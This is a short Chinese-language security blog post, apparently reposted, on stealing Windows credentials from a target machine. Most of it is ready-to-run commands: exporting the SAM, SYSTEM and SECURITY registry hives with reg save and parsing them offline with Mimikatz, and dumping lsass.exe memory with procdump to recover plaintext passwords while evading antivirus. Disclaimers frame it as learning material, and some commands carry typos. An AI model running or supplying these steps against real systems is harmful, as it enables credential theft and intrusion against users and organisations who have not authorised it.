文章总结： 本文介绍两种本地抓取目标机密码的方法：一是使用reg命令导出SAM、SYSTEM、SECURITY注册表文件，配合Mimikatz离线解析哈希密码；二是通过Procdump工具导出lsass.exe进程内存数据，实现免杀抓取明文密码。文章提供具体操作命令并强调技术仅用于学习目的。 综合评分： 77 文章分类： 渗透测试,内网渗透,红队,漏洞分析,恶意软件

本地抓取目的机hash密码

原创

小白鱼来了 小白鱼来了

Joker One Security

2026年1月3日 20:25 新加坡

在小说阅读器读本章

去阅读

/*本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。*/

minikatz离线抓取

注册表导出

利用下面的命令将注册表导出来

reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
reg save HKLM\SECURITY sercrity.hiv

执行后会在你运行位置的目录存放,比如：

然后将这两个文件与minikatz放在同一目录，执行以下命令

mimikatz.exe
lsadump::sam /sam:sam.hiv /system:system.hiv /sercrity:sercrity.hiv

dump lsass.exe 进程数据离线免杀抓取明文

32位机器：procdump.exe -accepteula -ma lsass.exe lsass.dmp    64位机器：procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

下载到本地利用minikatz进行解密

mimikatz.exesekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Joker One Security 小白鱼来了 小白鱼来了《本地抓取目的机hash密码》